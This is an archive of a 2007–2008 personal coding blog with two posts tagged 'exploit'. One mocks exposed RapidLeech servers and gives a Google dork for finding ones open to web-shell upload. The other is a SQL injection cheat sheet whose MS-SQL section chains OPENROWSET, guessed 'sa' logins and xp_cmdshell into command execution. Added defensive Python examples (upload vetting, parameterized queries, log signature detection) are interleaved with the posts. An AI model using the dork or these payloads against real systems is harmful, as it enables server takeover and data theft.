It's the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA... what now? Ruby?
No wait... it should be just RUBY!
Showing posts with label exploit. Show all posts

20080427

Digg + Idiots + RapidShare = p0wn3d


God damn it... dumb ideas just stay around for far too long.

OK, we all know what the hell RapidShare is: a waste of Internet space. A couple of years ago, though, somebody dugg an article on a way to get around its restrictions using a server-side script called RapidLeech. All in good fun, but come on... you leave this open on an Apache server that processes PHP files and allow public upload to your server from any URL (r57.php, c99/c100.php, the list just goes on and on). Renaming the file really helped, huh?

Just look at the multi-version Google dork [two years later and still 117+ zombies waiting to happen]:
"Bugs Report to Rapidget.bug"

Digg idiots: http://digg.com/tech_news/RapidLeech
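What the post is really complaining about is a "fetch this URL onto my server" feature with no policy on where the file lands or what it may be called. As an added example (not RapidLeech's code and not from the post), here is the vetting such a feature needs before writing anything near a PHP-enabled tree: a name and extension policy, a content check for PHP open tags, and a storage directory the web server never serves. The two directory paths and the extension lists are assumptions made for the demo.

```python
import os
import re
from pathlib import PurePosixPath

# Added example, not RapidLeech's own code. The flaw in the post is a
# "fetch any URL onto my server" feature that writes into a directory Apache
# hands to the PHP interpreter, so a fetched web shell runs on the next GET.
# Two controls are shown: a name/extension policy and a storage directory
# that the web server never serves. Both paths below are assumptions.
DOCROOT = "/var/www/html"        # assumed Apache DocumentRoot
STORE = "/var/lib/leech-store"   # assumed directory outside DocumentRoot

# Extensions a typical mod_php / AddHandler setup will execute or honour.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml",
                     "phar", "phps", "htaccess"}
# Types a download helper has any business storing (assumed allowlist).
ALLOWED = {"zip", "rar", "7z", "iso", "avi", "mkv", "mp3", "mp4", "pdf"}

# PHP open tags: "<?php" or the short echo tag "<?=".
PHP_OPEN = re.compile(rb"<\?(?:php\b|=)", re.I)


def vet_remote_filename(name):
    """Return (ok, reason). Rejects path components, dot-files, and any
    server-executable extension anywhere in the name (c99.php.zip included),
    then requires the final extension to be on the allowlist."""
    base = PurePosixPath(name.replace("\\", "/")).name
    if base != name:
        return False, "path components not allowed"
    if not base or base.startswith("."):
        return False, "empty or hidden name"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    if any(e in SERVER_EXECUTABLE for e in exts):
        return False, "server-executable extension"
    if exts[-1] not in ALLOWED:
        return False, "extension ." + exts[-1] + " not in allowlist"
    return True, "ok"


def looks_like_php(head):
    """True if the first bytes of a fetched file contain a PHP open tag;
    renaming a .php shell to .jpg does not change its content."""
    return PHP_OPEN.search(head) is not None


def storage_path(name, token):
    """Final on-disk path: caller-supplied random token as the filename,
    original extension kept for the later download, never under DOCROOT."""
    ok, reason = vet_remote_filename(name)
    if not ok:
        raise ValueError(reason)
    ext = name.rsplit(".", 1)[1].lower()
    path = os.path.join(STORE, token + "." + ext)
    if os.path.commonpath([DOCROOT, path]) == DOCROOT:
        raise RuntimeError("storage directory is inside the document root")
    return path


if __name__ == "__main__":
    for n in ("movie.avi", "c99.php", "c99.php.zip", "../x.zip", ".htaccess"):
        print(n, vet_remote_filename(n))
    print(looks_like_php(b"<?php system($_GET['c']); ?>"))
```

The token passed to `storage_path` should come from `secrets.token_hex()`, so the original name never influences where the file lands; `looks_like_php` is the content check to run on the first few KB of the fetched stream before committing it to disk.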

20070307

SQL injection and identification

Identify the SQL server through blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

If you get a different result from the plain request, the server executed the version-conditional comment, so it is MySQL 4.0.17 or later.

## String concatenation with || ==> PostgreSQL, Oracle
## String concatenation with + ==> MS-SQL, MS-Access

Boolean and UNION tests ($var, $quote_type and $select_statement are placeholders for the parameter, its quoting and the column-matched select):
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--
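The AND 1=1 / AND 1=0 pair above only gives different answers when the application splices the parameter into the SQL text. As an added example, not from the post, here is a lookup like index.php?some_var= written both ways against an in-memory SQLite table, plus a helper that runs the page's probe against each; SQLite stands in for MySQL, and the table contents are constructed for the demo.

```python
import sqlite3

# Added example. Same lookup written two ways; the page's boolean probe
# separates the 1=1 and 1=0 cases only against the first form.


def make_db():
    """Constructed table standing in for whatever index.php reads."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)",
                    [(1, "alpha"), (2, "beta")])
    return con


def lookup_vulnerable(con, some_var):
    # String concatenation: the request parameter becomes part of the SQL,
    # so "1 AND 1=0" changes the WHERE clause.
    sql = "SELECT name FROM items WHERE id=" + str(some_var)
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, some_var):
    # Bound parameter: the driver passes the value separately from the
    # statement text, so "1 AND 1=1" is a string no row's id equals.
    rows = con.execute("SELECT name FROM items WHERE id=?", (some_var,))
    return [row[0] for row in rows]


def probe_differs(lookup, con):
    """True when the 1=1 / 1=0 pair yields different results, i.e. the
    blind-injection test from the page succeeds against this lookup."""
    return lookup(con, "1 AND 1=1") != lookup(con, "1 AND 1=0")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe_differs(lookup_vulnerable, db))
    print("parameterized:", probe_differs(lookup_parameterized, db))
```

The parameterized form also neutralises the UNION template: the whole string is compared against the integer column and matches nothing, and the UNION is never parsed as SQL.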


MS-SQL

Check whether we are sysadmin (0x73797361646D696E is 'sysadmin' in hex):
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like:
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server (here [TMP]) and sa rights on it:
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If we are already sa:
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things to do:
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
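Every construct in the MySQL fingerprinting section and in the MS-SQL section above leaves a recognisable trace in a web access log or a SQL Server statement trace. As an added example that is not part of the post, here is a small signature pass over such lines, with a helper that decodes the hex-encoded role name for the analyst; the log format, the sample lines and the signature names are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Added example. Signatures are the constructs used on this page: the MySQL
# version comment, the 1=1/1=0 pair, UNION SELECT, the ;-- terminator,
# OPENROWSET/OPENQUERY, xp_cmdshell, IS_SRVROLEMEMBER and long hex literals.
SIGNATURES = [
    ("mysql_version_comment", re.compile(r"/\*!\d{5}", re.I)),
    ("boolean_probe", re.compile(r"\b(?:and|or)\s+1\s*=\s*[01]\b", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("comment_terminator", re.compile(r";\s*--")),
    ("mssql_adhoc_query", re.compile(r"\bopen(?:rowset|query)\s*\(", re.I)),
    ("mssql_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("mssql_role_check", re.compile(r"\bis_srvrolemember\s*\(", re.I)),
    ("hex_string_literal", re.compile(r"\b0x(?:[0-9a-f]{2}){4,}\b", re.I)),
]

# Constructed sample input: three Apache-style request lines and three
# statements as a SQL Server trace would record them.
SAMPLE = [
    '10.0.0.5 - - [07/Mar/2007:10:00:00] "GET /index.php?some_var=1 HTTP/1.1" 200',
    '10.0.0.5 - - [07/Mar/2007:10:00:01] "GET /index.php?some_var=1/*!40017%20s*/ HTTP/1.1" 500',
    '10.0.0.5 - - [07/Mar/2007:10:00:02] "GET /index.php?some_var=1%27%20AND%201%3D0%20union%20all%20select%201%2C2%3B-- HTTP/1.1" 200',
    "select 1 from OPENROWSET('SQLOLEDB','';'sa';'pass','select 1')",
    "select IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))",
    "select name from items where id=2",
]


def normalize(text):
    # Decode percent/plus encoding twice: payloads in URLs often arrive
    # double-encoded, and the page's own example uses %20.
    return unquote_plus(unquote_plus(text))


def classify(line):
    """Names of every signature that matches the (decoded) line."""
    text = normalize(line)
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan(lines):
    """[(line_number, [hit names])] for lines matching any signature."""
    out = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            out.append((number, hits))
    return out


def decode_hex_literal(token):
    """Turn 0x73797361646D696E into 'sysadmin' so the analyst sees the
    role name the statement was hiding."""
    return bytes.fromhex(token[2:]).decode("ascii", "replace")


if __name__ == "__main__":
    for number, hits in scan(SAMPLE):
        print(number, hits)
    print(decode_hex_literal("0x73797361646D696E"))
```

Two caveats for anyone wiring this into a pipeline: the boolean_probe pattern will also fire on legitimate queries that happen to contain `AND 1=1`, so it is a triage signal rather than a block rule, and the statement-side hits matter most when they come from an application login, since on SQL Server 2005 and later both ad hoc distributed queries (OPENROWSET/OPENQUERY against a provider string) and xp_cmdshell are disabled by default through sp_configure and have no business appearing in application traffic.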